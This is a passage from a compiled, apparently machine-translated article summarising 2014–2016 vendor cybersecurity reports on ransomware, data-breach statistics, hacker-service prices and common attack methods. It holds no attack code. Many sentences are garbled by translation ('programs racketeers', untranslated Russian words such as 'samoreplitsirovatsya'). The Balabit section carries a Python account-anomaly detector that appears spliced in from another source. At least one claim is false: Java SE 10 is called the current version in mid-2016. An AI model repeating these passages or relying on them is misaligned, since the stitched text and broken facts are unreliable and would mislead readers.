  • man-in-the-middle (MitM) attacks;
  • hardware infection;
  • insiders.

In the report the company concludes that most mining enterprises do not realize the importance of protection against cyber attacks, while vulnerabilities that attackers can exploit are detected constantly.

Cyber security specialists should pay special attention to large mining companies whose activity is directly connected with the state of the economy of certain regions or countries. They first of all need to implement advanced protection methods at all levels of enterprise management.

Cisco: programs racketeers come

On July 28, 2016 Cisco published the report on information security for the first half of the year 2016 in which pointed out a high probability of emergence of the next new generation of programs racketeers. In the light of this statement, the main solution of a task for the organizations in data protection, the company sees need to close "window of opportunities" before malefactors.

According to the report of Midyear Cybersecurity Report of Cisco company, organization are not ready to emergence of types of sophisticated programs racketeers and among the basic reasons promoting reserved activity of malefactors:

  • unstable infrastructure,
  • bad network hygiene,
  • low speed of detection.

Cisco 2016 Midyear Cybersecurity Report: Executive Perspectives, (2016)

Results of a research allow to draw a conclusion: the main difficulties of the company are experienced in attempts to limit operational space attacking that threatens all basic structure necessary for digital transformation. Malefactors broadened spheres of activity attacking servers, the refinement of the attacks increased, cases of use of enciphering for masking of malicious activity became frequent.

According to the results of the first half of the year 2016 of the program racketeers became the most profitable type of malicious software in the history, experts of Cisco said. They consider, this trend will remain, programs racketeers will have even more destructive functionality, having received capabilities to extend independently. In this case networks and the companies can become "hostages".

Cumulative Annual Alert Totals, (2016)

Modular types of such programs will quickly change tactics for achievement of maximum efficiency. For example, future programs racketeers will be able to avoid detection thanks to capability to minimize use of the central processor and to lack of managing commands. Such versions of programs racketeers will quicker extend the predecessors and prior to the attack to samoreplitsirovatsya in the organizations.

One of the main problems of the companies and networks, was and remains - a bad obozrevayemost of network and endpoints. On average on identification of new threats at the organizations leaves up to 200 days. Reduction of time of detection of threats is extremely important in terms of restriction of operational space of malefactors and minimization of damage from invasions.

Additional conveniences attacking create the unsupported and unrenewable systems which allow them to get access, to remain unnoticed, to increase the income and to cause the maximum damage. The report of Cisco MCR 2016 demonstrates that the problem belongs to universal. Within several months growth of the attacks is mentioned in the most important industries (for example, in health care), at the same time all vertical markets and world regions become the purpose of malefactors. Public organizations and the enterprises, charitable and non-governmental organizations, the companies of e-commerce — all of them in the first half of 2016 fixed growth of number of the attacks.

Attackers do not limit themselves

Attackers' profits are directly proportional to how long their actions remain undetected. According to Cisco, attackers' income increased in the first half of 2016 owing to several factors:

  • Expanding the field of action. Attackers are broadening their field of action, moving from client-side to server-side exploits, evading detection and maximizing both the damage to enterprises and their own income.
    • Adobe Flash vulnerabilities remain one of the main targets of malvertising and exploit kits. In the widespread Nuclear exploit kit, 80% of successful compromises are attributable to Flash.
    • Cisco also noted a trend of ransomware exploiting server vulnerabilities, particularly in JBoss servers (10% of all servers connected to the Internet are compromised). Many of the JBoss vulnerabilities used to compromise systems were disclosed five years ago, and basic patches and vendor updates could have prevented such attacks.

  • New attack methods. In the first half of 2016 cybercriminals developed methods that exploit the lack of network visibility.

    • Windows binary exploits came out on top among web attacks over the last half year. This method provides a strong foothold in network infrastructures and complicates the detection and remediation of attacks.
    • Facebook social-engineering scams moved from first place (2015) to second.

  • Covering tracks. In addition to the visibility problems, attackers began to use encryption more often as a technique for masking various aspects of their activity.

Defenders' actions in attempts to reduce vulnerabilities and close gaps

Faced with sophisticated attacks, companies with limited resources and aging infrastructure find it difficult to keep up with their adversaries. The data obtained suggest that the more important a technology is for business operations, the worse the state of network hygiene, including software patching. For example:

  • among browsers, the latest or next-to-latest version of Google Chrome, which supports automatic updates, is used by 75 — 80% of users;
  • Java is updated much more slowly: one third of the studied systems run Java SE 6, which Oracle retired long ago (the version current as of July 28, 2016 — SE 10);
  • no more than 10% of Microsoft Office 2013 v.15x users have installed the latest service pack.

Cisco's research also revealed that most of the potential victims' infrastructure is unsupported or operated with known vulnerabilities. It is a systemic problem, both for vendors and for endpoints. Inspecting more than 103 thousand devices connected to the Internet, Cisco found:

  • each device had on average 28 known vulnerabilities;
  • the average age of the known vulnerabilities on devices was about 5.64 years;
  • more than 9% of the known vulnerabilities were older than 10 years.

For comparison, Cisco specialists inspected more than 3 million software infrastructures, mainly on the Apache and OpenSSH platforms. In them, 16 known vulnerabilities with an average age of 5.05 years were found on average.

Updating the browser on a user's device is simple; updating corporate applications and server frameworks is harder, since it can interrupt business processes. The conclusion drawn in the research: the more important an application's role in a company's business operations, the less likely it is to be updated regularly and frequently, which leads to gaps in protection and opportunities for subsequent attacks.

Prices for cracking social network and e-mail accounts

Server hacking, theft of funds from bank cards, personal data leaks – these and many other "services" now have a price. Dell SecureWorks, which specializes in the assessment and analysis of the information security of computer systems, published in summer 2016 a "price list" of hacker services worldwide. Market participants see it as one of the signs that cybercrime is flourishing.

According to the specialists, access to an American social network account costs about $129, and to a Russian Odnoklassniki or VKontakte account $194. Cracking a Gmail, Hotmail or Yahoo account costs on average $129. And for only 40-60 thousand rubles it is possible to "order" any information about a domestic competitor: bank account data, TIN, constituent documents, information about employees and phone numbers.

News about theft of personal data or illegal withdrawals from bank cards appears in the press with enviable regularity. In May, for example, the personal data of 117 million users of the social network LinkedIn were offered for sale on the dark web. According to analysts' estimates, the hacker under the alias "Peace" could earn about $2.5 thousand from it. And the other day a woman from the Nizhny Novgorod Region transferred 85 thousand rubles to a fraudster, believing she was talking to a bank employee.

Balabit: top 10 most popular hacker methods

1. Social engineering (for example, phishing)

Most hackers aim to become insiders and to escalate the privileges of a stolen account. Finding an existing privileged account and cracking its password is not the fastest process, and it leaves many traces (for example, the extra logs generated by automated attack attempts) which considerably increase the risk that the suspicious activity is detected. For this reason hackers prefer social engineering techniques that induce users to share their login and password voluntarily.

"The recent theft of data on more than 10,000 employees of the Department of Justice and the Department of Homeland Security, and the cracking of more than 20,000 accounts of Federal Bureau of Investigation (FBI) staff, once again prove that today it is much simpler for hackers to get 'in' to a system using social engineering tactics than to write zero-day exploits," says Zoltán Györkő, CEO of Balabit. "Traditional access control tools and anti-virus solutions are certainly necessary, but they protect a company's most important assets only while the hackers are outside the network. Once they get into a system, even through low-level access, they can easily escalate their privileges and obtain privileged administrative access to the corporate network. The biggest risk is a hacker inside the network once he has become one of the privileged users.

"Compromised accounts (when legitimate logins and passwords are used for criminal purposes) can be detected by noticing changes in user behaviour, for example in the time and place of login, typing speed on the keyboard, the commands used, or suspicious use of accounts in scripts. User behaviour analytics tools, which build baseline profiles of real employees' actions, can easily detect anomalies in account use and alert security experts about them or block the user until all the circumstances are clarified," adds Zoltán Györkő.
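The behavioural baseline described above, as an added illustration (not Balabit's product code): a per-user profile is built from known-good sessions (login hour, source country, typing speed, commands used) and new sessions are scored against it; all session records are constructed sample data, and the alert/block policy is a hypothetical one chosen for the example.

```python
"""Behavioural baseline for privileged accounts (illustrative, constructed data)."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed "known-good" sessions used to build the baseline for one user.
BASELINE_SESSIONS = [
    {"user": "alice", "hour": 9,  "country": "HU", "typing_cpm": 240, "commands": {"ls", "git", "vim"}},
    {"user": "alice", "hour": 10, "country": "HU", "typing_cpm": 255, "commands": {"ls", "git", "make"}},
    {"user": "alice", "hour": 14, "country": "HU", "typing_cpm": 248, "commands": {"git", "vim", "make"}},
    {"user": "alice", "hour": 17, "country": "HU", "typing_cpm": 251, "commands": {"ls", "git"}},
]


def build_profiles(sessions):
    """Aggregate per-user baselines: active hours, countries, commands, typing statistics."""
    by_user = defaultdict(list)
    for s in sessions:
        by_user[s["user"]].append(s)
    profiles = {}
    for user, recs in by_user.items():
        speeds = [r["typing_cpm"] for r in recs]
        profiles[user] = {
            "hours": {r["hour"] for r in recs},
            "countries": {r["country"] for r in recs},
            "commands": set().union(*(r["commands"] for r in recs)),
            "cpm_mean": mean(speeds),
            # A flat baseline would give a zero deviation; fall back to 1.0 to avoid division by zero.
            "cpm_std": pstdev(speeds) or 1.0,
        }
    return profiles


def score_session(session, profiles, hour_slack=1, z_limit=3.0):
    """Return the list of anomaly reasons for a session; an empty list means it looks normal."""
    prof = profiles.get(session["user"])
    if prof is None:
        return ["unknown user (no baseline)"]
    reasons = []
    # Time of login: allow +/- hour_slack around any hour seen in the baseline.
    if not any(abs(session["hour"] - h) <= hour_slack for h in prof["hours"]):
        reasons.append(f"login hour {session['hour']} outside baseline")
    # Place of login: a country never seen for this account.
    if session["country"] not in prof["countries"]:
        reasons.append(f"new source country {session['country']}")
    # Typing speed as a z-score against the user's own history.
    z = abs(session["typing_cpm"] - prof["cpm_mean"]) / prof["cpm_std"]
    if z > z_limit:
        reasons.append(f"typing speed z-score {z:.1f}")
    # Commands this account has never used before.
    new_cmds = session["commands"] - prof["commands"]
    if new_cmds:
        reasons.append(f"unseen commands {sorted(new_cmds)}")
    return reasons


def decide(session, profiles, block_threshold=2):
    """Hypothetical policy: one anomaly alerts the security team, two or more block the user pending review."""
    reasons = score_session(session, profiles)
    if len(reasons) >= block_threshold:
        return "block", reasons
    if reasons:
        return "alert", reasons
    return "allow", reasons


if __name__ == "__main__":
    profiles = build_profiles(BASELINE_SESSIONS)
    # Constructed session that matches the baseline, and one that deviates on every axis.
    normal = {"user": "alice", "hour": 10, "country": "HU", "typing_cpm": 250, "commands": {"ls", "git"}}
    odd = {"user": "alice", "hour": 3, "country": "XX", "typing_cpm": 300, "commands": {"ls", "scp"}}
    for s in (normal, odd):
        print(s["user"], s["hour"], decide(s, profiles))
```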

2. Compromised accounts (for example, weak passwords)

Cracking accounts, especially weakly protected ones, is dangerous because users usually prefer simple, easily remembered passwords, often the same ones for corporate and personal accounts. If a hacker obtains a user's login and password from a less secure system (for example, a personal social network account), he can use them to enter the company's network.

3. Web attacks (for example, SQL injection)

Exploiting security holes in online applications (for example, SQL injection) is still a very popular cracking method, mainly because applications are the most important interface through which a large number of internal and external users access company assets, which makes them an attractive target for attacks. Unfortunately, the quality of application code still raises questions in terms of security. There are many automated scanners that attackers can use to find vulnerable applications. Other cracking methods can bring hackers the same results but are harder to apply or take longer. For example, writing an exploit takes more time and requires good programming skills.

The remaining places among the most popular hacker methods were distributed as follows:

4. Client-side attacks (i.e. on document readers and browsers)
5. Use of exploits for popular server software (for example, OpenSSL, Heartbleed)
6. Unmanaged personal devices (for example, in the absence of a BYOD policy in the corporate environment)
7. Physical intrusion
8. Shadow IT (for example, use of personal cloud services by users for work purposes)
9. Use of third-party service providers (for example, infrastructure outsourcing)
10. Theft of data uploaded to the cloud (for example, IaaS, PaaS)


Gemalto: Breach Level Index 2015, index of data breach severity

In February 2016 Gemalto published the results of its Breach Level Index [30] analysis [31], according to which 1,673 incidents were recorded worldwide in 2015, leading to the compromise of 707 million data records.

Breach Level Index 2015

According to the Breach Level Index, since 2013, when the company began compiling its comparative database of publicly disclosed breaches, more than 3.6 billion data records have been compromised in total. By source, the largest number of incidents in 2015 came from attacks by malicious outsiders: 964 such incidents were recorded, or 58% of the total number of incidents and 38% of the number of compromised data records. By type of compromised data, breaches aimed at identity theft remained the most widespread: 53% of the total number of incidents and 40% of all compromised data records.

By industry, the public sector accounted for 43% of all compromised data records, 476% more than in 2014 (owing to several extremely large breaches in the USA and Turkey), but only 16% of the total number of breaches. The healthcare sector accounted for 19% of compromised records and 23% of all breaches. The number of compromised records in the retail sector fell sharply compared with the same period of the previous year (by 93%): in 2015 retail accounted for only 6% of all stolen data records and 10% of all recorded breaches. In financial services the number of compromised accounts fell by almost 99%, accounting for only 0.1% of all compromised data records, or 15% of the total number of breaches.

Although most breaches were linked to the activity of malicious outsiders (58%), accidental loss accounted for a full 36% of all compromised data records. State-sponsored attacks made up only 2% of all breaches, but the records stolen in such attacks were 15% of all compromised records. Malicious insiders accounted for 14% of all breaches and only 7% of the compromised data records.

Geographically, 77% of all breaches occurred in North America, with 59% of all compromised records attributable to the USA. Europe accounted for 12% of the total number of incidents, and the Asia-Pacific region for only 8%.

The full results of the breach analysis, including breakdowns by industry, source, type and geography, are available in the 2015 Breach Level Index Report.

Gemalto: only encryption will help protect against data loss

Compared with the first half of 2014, the number of breaches increased by 10%, while the number of compromised data records in the first six months of the year fell by 41%. The decrease in compromised data is explained by the fact that fewer large-scale breaches were recorded in the retail industry this year than in the same period of last year.

Despite the decrease in the total number of compromised records, large breaches still carry off large volumes of personal information and credentials. The identity-theft attack on clients of Anthem Insurance was the largest breach of the first half of 2015. This attack, which scored 10 on the Breach Level Index severity scale, compromised 78.8 million accounts, nearly one third (32%) of all data records stolen in the first half of 2015. Other large incidents in the reporting period included the breach of 21 million accounts at the U.S. Office of Personnel Management (BLI severity 9.7); the breach of 50 million accounts at Turkey's General Directorate of Population and Citizenship Affairs (BLI severity 9.3); and the breach of 20 million accounts at the Russian service Topface (BLI severity 9.2). In fact, 81.4% of all compromised data records belong to the 10 largest breaches.

Breaches by source

Only 2% of all incidents were state-sponsored, but the data compromised in such attacks totals 41% of all stolen records, owing to the scale of the Anthem Insurance and U.S. Office of Personnel Management incidents. Whereas none of the ten largest incidents in the first half of 2014 was a state-sponsored attack, this year three of the ten largest breaches, including the two largest, were state-sponsored.

At the same time, malicious outsiders became the most widespread source of breaches in the first half of 2015: 546 breaches, or 62% of all breaches, compared with 465 breaches (58%) in the first half of last year. Malicious outsiders compromised 56% of records, or 116 million, whereas in 2014 the figures were higher: 71.8%, or 298 million data records.

Breaches by type

Theft of personal and identity data remains the main type of breach, accounting for 75% of all compromised records and slightly more than half (53%) of all breaches recorded in 2015. Five of the ten largest breaches, including the three largest, which received "catastrophic" status on the Gemalto index, were thefts of such data. For comparison, in the same period of last year seven of the ten largest incidents were thefts of personal and identity data.

Breaches by industry

By industry, about two thirds of all compromised records (31% and 34% respectively) came from breaches in government agencies and in healthcare, even though healthcare accounted for only 21% of the total number of breaches this year, compared with 29% the previous year. The retail sector saw a considerable decrease in stolen records, accounting for only 4% of all compromised data (compared with 38% last year). By region, the largest number of breaches – more than three quarters (76%) – occurred in the USA, where about half (49%) of all data was compromised. 26% of all compromised data came from Turkey, mainly because of the large-scale breach at GDPCA, where 50 million records were compromised through the malicious actions of third parties.

The share of incidents in which the exposed data was encrypted (which considerably reduces the possible loss from a breach) rose slightly, to 4% of all incidents (in the first half of 2014 this figure was 1%).

According to Forrester, attackers use ever more sophisticated and complex attack mechanisms, so the effectiveness of traditional perimeter security measures has considerably decreased. The constantly changing and evolving nature of threats requires new security measures, one of which is the universal use of data encryption technologies. In the future, organizations will automatically encrypt data, both in transit over the network and at rest on storage media. A data-centric approach to security is much more effective in countering hackers. By encrypting confidential data, organizations make it useless to attackers, so attacks on corporate networks become unprofitable and hackers switch to less protected targets. Encryption is becoming the strategic foundation for security and risk management leaders who are responsible for data protection and the confidentiality of information in their organizations.

Trend Micro Security Predictions

The main forecasts for 2015 from 'Trend Micro Security Predictions for 2015 and Beyond: The Invisible Becomes Visible':

  • More and more cybercriminals will turn to underground networks and closed forums to exchange and sell criminal software;
  • Increased attacker activity will lead to the emergence of more sophisticated hacking tools;
  • Mobile vulnerabilities will play a growing role in device infection; exploit kits targeting Android will spread;
  • Targeted attacks will become the most widespread type of cybercrime;
  • New mobile payment methods will give rise to new threats;
  • We will see new attempts to exploit vulnerabilities in open-source applications;
  • The diversity of technologies still protects Internet of Everything structures from mass attacks, but the same cannot be said of the data they process;
  • New, even more dangerous threats to online banking and other financial services will appear.

Forecasts for targeted attacks

According to the report, after cybercriminals achieved noticeable results in the USA, the number of new targeted attacks will grow in 2015. Experts expect hackers in Vietnam, Great Britain and India to continue using targeted attacks, and attacks will also appear in countries where they were not previously observed, as happened in Malaysia and Indonesia.

Forecasts for threats to financial services

The banking sector should expect a substantial increase in the level of threats; a growth in the number of unique cyber attacks aimed at banks and other financial institutions is predicted. In this regard, financial institutions should implement two-factor authentication for their online services.

Forecasts for threats to the Internet of Everything

The "Trend Micro Security Predictions for 2015" report also predicts increased exploitation of vulnerabilities in "smart devices" such as cameras, various household systems and TVs, as cybercriminals attack these platforms, and the organizations managing their data, ever more aggressively.

Factors such as market pressure push device manufacturers to release ever smarter systems, but in the race to meet demand they do not always manage to address security. Cybercriminals will therefore find vulnerabilities ever more often and use them for their own purposes.

HP Cyber Risk Report

On February 24, 2015 HP published the Cyber Risk Report, its cyber security report for 2015, containing an analysis of the most pressing issues business faced in 2014 [32].

Staff of the HP Security Research division studied the widespread vulnerabilities that threaten organizations' security. According to the results, "old", well-known vulnerabilities and misconfigurations were the main causes of cyber security problems in 2014.

"Cyber defense technologies are continuously improving, but we should not lose sight of old vulnerabilities," says Art Gilliland, senior vice president and head of Enterprise Security Products at HP. "We found that the most serious security risks are connected with vulnerabilities we have known about for a long time. And we cannot move forward having forgotten about these problems."

Main research results

  • 44% of known security incidents are connected with vulnerabilities that are 2–4 years old. Attackers continue to use "old" methods to crack systems and penetrate networks. The largest attacks of 2014 were carried out using vulnerabilities in code written years or even decades ago.
  • Server misconfiguration is problem number one. According to the research, the main misconfiguration problem is granting overly broad access rights to files and folders. The information attackers obtain this way is then used to carry out other attacks.
  • In 2014 cybercriminals actively used new attack channels, for example physical devices connected to the network through the Internet of Things. Growth in the amount of mobile malware was also observed. The expanding computing ecosystem plays into attackers' hands, creating ever more "entry points" into systems.
  • Defects and errors, including logic errors, are the main cause of software vulnerabilities. Most vulnerabilities arise from a small number of common coding errors. Cybercriminals quickly "master" both old and new software vulnerabilities.

What needs to be done to stay secure?

  • Implement a comprehensive patching strategy. Keeping systems up to date significantly reduces the probability of a successful attack.
  • Regular penetration testing and configuration checks (in-house or by external organizations) will reveal configuration errors before hackers exploit them.
  • Before implementing new technologies, it is useful to analyze how they will affect the overall security level.
  • Effective threat intelligence sharing will help form a picture of attackers' tactics, take preventive measures, and improve protective software to strengthen security in general.

CyberEdge Group Cyberthreat Defense Report: more than half of companies fear successful cyber attacks against them in 2015

On August 10, 2015 the results of CyberEdge Group's annual Cyberthreat Defense Report were published, containing information on how IT security professionals perceive cyberthreats and the methods of fighting them.

More than 800 heads of IT security departments and practicing specialists, representing 19 different industries, took part in the report.

Report on counteraction to threats, 2015

Some statistics:

  • more than half (52%) of respondents assume that their companies will fall victim to successful cyber attacks in 2015. In 2014 the figure was 39% of survey participants.

  • respondents name attacks on web applications as the key cyberthreat. Web applications are widespread in modern companies and are often the focus of attackers' attention. There are many reasons for this, not least the possibility of direct access to confidential data.

  • mobile device security is a concern for specialists. When assessing their companies' ability to defend against cyberthreats in different IT areas, respondents gave the lowest marks to mobile devices.

Level of concern about cyber attacks, 2015

Next in the rating come laptops and social network applications. More than 2/3 of the organizations surveyed want to replace or upgrade the endpoint protection tools they already have. Respondents noted that the use of personal devices for work (BYOD) will nearly double this year – from 30% to 59%. This indicates the need for additional investment in mobile security.

According to survey participants, SDN technology can have a positive influence on protection against cyber attacks – 63% of respondents share this view. When asked how SDN affects a company's ability to fight cyberthreats, the number of respondents who consider the technology a useful solution considerably exceeds the number who do not share their colleagues' confidence (a ratio of about 10 to 1).

Security level by IT area, 2015

62% of respondents said that the IT security budget should be increased in 2015. Experts advise paying special attention, when allocating funds, to the following aspects:

  • next-generation protection for endpoints and mobile devices;
  • the rapidly developing cyberthreat intelligence services;
  • software-defined security solutions.

Positive Technologies: top cyber attack trends of 2015

On October 15, 2015 representatives of Positive Technologies spoke at the conference "Trends in the Development of Crime in the Field of High Technologies — 2015".

Discussing hi-tech crime and cyberthreats, Vladimir Kropotov, head of the monitoring department at Positive Technologies, and leading analyst Evgeny Gnedin presented the report "Statistics and trends of cyber attacks over the year: a look from outside, from inside and from the side". The experts noted the top cybercrime trends of the current year:

  • attacks in which attackers take an indirect route – for example, by hacking partners of the target organization – became widespread;
  • the number of cases in which social engineering is combined with technical methods grew. Cybercriminals gain access to a partner's mail (or find out his e-mail address and register a look-alike domain specially for the attack) and enter into correspondence with the victim, who does not suspect the substitution;
  • growth in attacks aimed at a specific person, group of people or specific companies. Whereas earlier criminals usually acted by compromising workstations, in 2015 30% of the analyzed attacks were made on corporate resources (mail servers, database servers, internal web services). Investigating targeted attacks, the experts noted advanced techniques such as Watering Hole, which make identification of the attacks by specialist organizations harder and allow targeted attacks to be disguised as mass ones.

Any equipment connected to the Internet (Internet of Things) is also exposed to attacks. Criminals exploit the fact that users rarely install updates on such devices, which leaves them vulnerable to threats from the Internet. There are many such devices on the network: routers, "smart" TVs, heat sensors and cars. Attackers can quickly gain access to hundreds of devices from a single computer and use them for DDoS attacks or to build botnets while remaining unnoticed. A peculiarity of these devices is that rebooting or powering them off erases all traces of the attack.

Positive Technologies specialists announced the results of their work on security incident audits, application source code analysis and cybersecurity monitoring. The study covered 16 systems of large companies and state organizations (Russian and foreign) on which external penetration tests were carried out in 2014 — 2015.

The company's statistics confirm that in 44% of cases it was possible to gain full control over all systems of a corporate structure from the outside, and administrator privileges in critical systems (databases, e-mail, executives' workstations) in 33% of cases. In 58% of systems, gaining full control over critical resources required only rather low attacker skill; in 26% the difficulty of access was medium; and in only 16% did the testers fail to get into the corporate network. In most cases (56%) the existing vulnerabilities of web applications were used, and in 26% access was gained by guessing dictionary passwords.

"Our research showed that only 20% of the analyzed attacks used zero-day vulnerabilities, i.e. previously unknown ones. This means that in 80% of cases the victims had the opportunity to protect themselves effectively, but did not use it," noted Vladimir Kropotov.


Positive Technologies experts note a trend toward increasingly complex telecommunication networks. With the growth of services such as Skype, WhatsApp and Google, mobile operators' revenues have fallen. Finding new ways to earn profit became a pressing problem for them: the companies now offer not only cellular communication but also home Internet, IP television and proprietary applications. All this complicates the network: earlier telephony, the Internet and cable television had separate networks; now they are integrated into one common network. This tight integration creates risks of information security violations.

Positive Technologies' work on testing the protection of mobile networks showed that vulnerabilities in cellular networks based on SS7 technology allow even a low-skilled attacker to carry out attacks such as disclosure of the subscriber's location, denial of service to the subscriber, SMS interception, forgery of USSD requests and money transfers with their help, redirection of voice calls, call interception, and denial of service to the mobile switch. According to Positive Technologies, most telecom operators are not protected from such attacks. However, a positive trend has emerged: telecom operators are now interested in monitoring the security of their networks. Next year the experts predict growth in their demand for cybersecurity services.

84 million new malware samples, 9 million more than in 2014

PandaLabs, the anti-virus laboratory of Panda Security, detected and neutralized over 84 million new malware samples during 2015, nine million more than in 2014. This means that about 230,000 new malware samples appeared every day in 2015.

Last year saw the largest number of cyber attacks recorded worldwide, using about 304 million threat samples. Consequently, more than a quarter of all malware samples ever used were created in 2015 (27.63%).

Last year was also difficult for a number of multinational companies that suffered large-scale data theft and negative impact on their IT systems.

The most powerful threats in 2015: trojans and PUPs

In 2015 trojans, PUPs (potentially unwanted programs) and individual Cryptolocker families spread fear among large companies around the world through massive attacks and the theft of thousands of confidential files.

Trojans remain the main source of malware (51.45%), comfortably ahead of the other types: viruses (22.79%), worms (13.22%), PUPs (10.71%) and spyware (1.83%).

Besides trojans, Cryptolocker (ransomware, i.e. file-encrypting malware) was the main protagonist of cyber attacks throughout the year. According to Corrons, "Cryptolocker is the best choice for cybercriminals, since it is one of the easiest ways to make money. Besides, it has proved very effective, especially with enterprises which do not think long before paying the ransom to regain control over the stolen information."

The largest infections are caused by trojans

Among all types of malware which led to large infections around the world trojans showed the highest level of infection (60.30%), but their indicator decreased by 5% in comparison with 2014.

PNP also had rather negative impact: about a third of cases of infections used technology of deception for penetration on the PC of the victims. Far behind in this "rating" there were such types of threats as advertizing and spyware (5.19%), worms (2.98%) and viruses (2.55%).

China remains one of the most infected countries of the world

Last year was remarkable the fact that it showed the highest levels of infections on computers. In the geographical plan China was the country with the biggest level of the infected computers (57.24%), and this indicator was about 30% higher, than in 2014. Taiwan with the infection level of 49.15%, and on the third place – Turkey (42.52%) was located with a trace. These three countries still remain at top of this rating of infections as it was in 2014 and 2013.

Ten the most infected countries of the world did not include the following countries which showed infection level above the average world values: Colombia (33.17%), Uruguay (32.98%) and Spain (32.15%).

The Scandinavian countries showed the lowest level of infection

Nine countries present Europe in ten less infected countries of the world, and only Japan was the only country from other continent.

The Scandinavian countries took all three upper positions: Finland showed the lowest level of infection of 20.32%, Norway (20.51%) and Sweden follow further (20.88).


Is it better to pay than to protect?

Half of the financial institutions in Russia compensate their clients for losses suffered through Internet fraud without conducting an investigation. 31% of companies are ready to consider compensation after an internal investigation of the incident, and 8% require an external investigation for this. These data were obtained in a dedicated study of business attitudes to cyberthreats conducted by Kaspersky Lab together with the independent agency B2B International in 2014.

As the experts found, many organisations working with online payments are ready to accept inevitable monetary risks rather than invest in specialised IT protection. A quarter of companies still believe that the expenses caused by cyberthreats are lower than the cost of protective solutions. Surprisingly, among financial institutions, which are most directly involved in online money transactions, the share holding this position is even higher: 33%.

According to data obtained through the Kaspersky Security Network cloud infrastructure, in 2013 nearly 4 million users of Kaspersky Lab products faced attempts to steal their money using specialised malware (an 18.6% increase over 2012). This shows attackers' growing interest in electronic payments, and the trend will inevitably mean that the expenses companies incur on compensation payments will turn out to be significantly higher than investments in protection against such cyberthreats.

"Besides budgeting separate funds to compensate stolen property, financial companies also incur the cost of processing client complaints. But most importantly, even if the injured party's money is quickly returned, they will wonder whether it is worth using the services of a bank that cannot ensure the safety of their online account. It is better to prevent losses than to compensate them," comments Alexander Ivanyuk, senior manager for business-solution development for financial companies at Kaspersky Lab.

Gemalto: overview of data leaks and thefts

In February 2015 Gemalto published the results of its Breach Level Index (SafeNet Breach Level Index, BLI), according to which more than 1,500 data breaches in 2014 led to the compromise of about one billion data records worldwide. This means the number of data breaches grew by 49%, and the number of stolen or lost records by 78%, compared with 2013.

Continuing the comparative analysis developed by SafeNet, a company Gemalto acquired, the Breach Level Index (BLI) is a global database of data breaches that gives security specialists a method for assessing the severity of a breach and ranking it among publicly disclosed breaches. BLI scores the severity of a breach on several parameters based on the publicly disclosed information about it.

According to the BLI database, identity theft was the main motivation of cybercriminals in 2014; this type of theft accounted for 54% of all breaches and exceeded all other categories, including access to financial information. Moreover, breaches involving theft of personal information made up a third of the most serious breaches, those rated by BLI as catastrophic (9.0-10 points on the BLI scale) or severe (7.0-8.9 points). The number of security breaches, including perimeter breaches, in which the compromised data were fully or partly encrypted increased from 1% to 4%.

In 2014 there was not only a shift towards more identity theft; breaches also became more serious: two thirds of the 50 most serious breaches by BLI score occurred in 2014. Moreover, the number of breaches involving more than 100 million compromised records doubled compared with 2013.

By sector of the economy, retail and financial services saw the most notable changes in 2014 compared with other sectors. In retail the number of breaches increased slightly compared with the previous year, making up 11% of all breaches in 2014. In terms of compromised records, however, retail's share grew to 55% from 29% the previous year because of the increased number of attacks on point-of-sale systems. In financial services the number of breaches remains fairly stable from year to year, but the average number of records lost per breach increased tenfold, from 112,000 to 1.1 million.

According to BLI, personal data remained the main objective of cybercriminals' attacks in 2014; 54% of incidents were of this kind. Most often information is stolen from retailers. Having broken into the IT systems of retail chains, hackers obtain personal data such as:

  • payment card data,
  • information provided when applying for a discount or loyalty card,
  • home address details,
  • mobile phone number, etc.

Annual information security reviews state that data most often leaks through companies' own staff, either through malicious intent or through negligence. Third-party competitor companies steal information as often as hackers do.

The most information leaks in 2014 were recorded in the USA. This is explained by the particular scrupulousness with which Americans treat personal data. For example, in March 2014 an insider who had copied patients' personal data was detected at a health facility in the USA. Only four patients could have become victims of the theft, but as a result several thousand patients who had attended the institution during the years the insider worked there were affected.

The Breach Level Index (BLI) comprises a centralised global database of breaches and assesses the severity of each breach on several parameters, including the type of data and the number of records stolen, the source of the breach, and whether the leaked data were encrypted. Each breach receives a score, so the BLI is a comparative table of breaches that distinguishes small, insignificant incidents from truly large and significant ones. The data entered in the BLI database are based on publicly available information on breaches.

Global Cyber Executive Briefing by Deloitte Touche Tohmatsu Limited

The Global Cyber Executive Briefing report by Deloitte Touche Tohmatsu Limited states that practically all organisations will be subject to cyber attacks, so top managers need to delve as deeply as possible into the nature of the key threats and identify the most vulnerable assets (as a rule, those that are the cornerstone of the business).

"If earlier, to gain a benefit, attackers needed physical presence and direct contact with the object of their illegal acts, now everything has become much simpler. Nowadays, when technologies develop faster and faster every year, information has acquired extremely high value," notes Sergey Bukhanov, director of the Enterprise Risk Management Department at Deloitte CIS. "The vast majority of the most 'profitable' crimes for attackers today are committed remotely, as the news feeds of recent months eloquently testify: theft of money from the accounts of hundreds of clients of a popular network of payment terminals; theft of payment-card data of hundreds of thousands of citizens who bought tickets via the website of one of the world's largest transport companies, which forced some banks to block or limit the functionality of the cards of several thousand clients. In addition, we often learn of bank employees being exposed who used excess privileges to transfer clients' funds illegally to personal accounts, or to issue bank guarantees through unauthorised use of the SWIFT system. Considering all this, more and more heads of companies around the world are coming to understand the importance of the emerging threats and pay special attention to information security when using information technologies. It is also important to note that over the last several years the legislation of the Russian Federation in areas related to the secure use of information technologies and personal data protection has been improved. Thus new standards of the Central Bank of the Russian Federation on information security for banking systems have been published, and the issue of strengthening liability for high-technology crimes committed in the banking sector for the purpose of stealing money is being discussed."

According to the report's conclusions, building resilience begins with identifying weaknesses in application software and strengthening the digital infrastructure. Accordingly, organisations that want to show vigilance should be ready to detect any attack as early as possible. Rapid mobilisation includes early detection of a threat's activity, the reason for the attack and how it will manifest itself. Rapid identification of an attack can serve as the organisation's signal to act and thus help to contain and eliminate the threat.

The main conclusions of the report, including threats to companies by industry:

  • High technology: such companies are constantly the target of attacks that threaten the largest losses of intellectual property, and are also the most exposed to hacktivism. Such attacks are also used as a means of attacking and infecting other companies.
  • Online media: such companies are most exposed to cyber attacks aimed at damaging their reputation. Such attacks are also used as a means of attacking and infecting other companies.
  • Telecommunications: these companies face an increased level of technically sophisticated attacks, including from government agencies using advanced persistent threats to establish covert surveillance over long periods. Another significant threat specific to the telecommunications sector is attacks on leased equipment, such as the home routers of Internet service providers.
  • E-commerce: here the main event is the compromise of databases (i.e. loss of client data, including names, physical addresses and phone numbers). Vulnerable areas such as online payment systems are often attacked. The most widespread type of attack is denial of service; in particular it is used by hacktivists who want to disrupt an organisation's work in the most visible way.
